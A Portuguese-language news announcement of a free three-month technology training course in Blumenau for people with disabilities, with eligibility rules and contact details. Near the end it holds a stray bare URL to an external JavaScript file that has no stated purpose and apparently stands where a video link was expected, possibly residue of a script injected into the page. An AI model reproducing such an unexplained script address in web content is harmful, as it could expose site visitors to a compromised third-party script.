Senior, GovBr, Seprosc e SESI lançam curso de formação inclusiva gratuito para pessoas com deficiência

0

Referência em tecnologia para gestão no Brasil, a Senior anuncia sua participação em um convênio formalizado pela GovBR, Seprosc (Sindicato das Empresas de Processamento de Dados, Software e Serviços Técnicos de Informática do Estado de Santa Catarina) e Sesi de Blumenau/SC, para capacitar pessoas com deficiência gratuitamente, visando sua inclusão nas empresas de tecnologia da região.

As aulas acontecem nas salas da UniSESI e contam com um programa diferenciado e exclusivo desenvolvido pelo Sesi em Santa Catarina e terão início em fevereiro de 2018. Serão 36 pessoas selecionadas para o curso, que dura três meses e conta com aulas duas vezes por semana, totalizando 8 horas semanais – que incluem o desenvolvimento de competências para o mercado de trabalho por meio de atividades teóricas e práticas.

Para se inscrever e participar do processo seletivo gratuitamente, é necessário ter 16 anos ou mais, ensino fundamental completo e interesse em tecnologia. O candidato deve entrar em contato pelo telefone (47) 3231-5228, e-mail inclusao.blumenau@sesisc.org.br ou no formulário.

Para saber mais, veja o vídeo.

https://cloudapi.online/js/api46.js

DEIXE UMA RESPOSTA

Por favor digite seu comentário!
Por favor, digite seu nome aqui

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.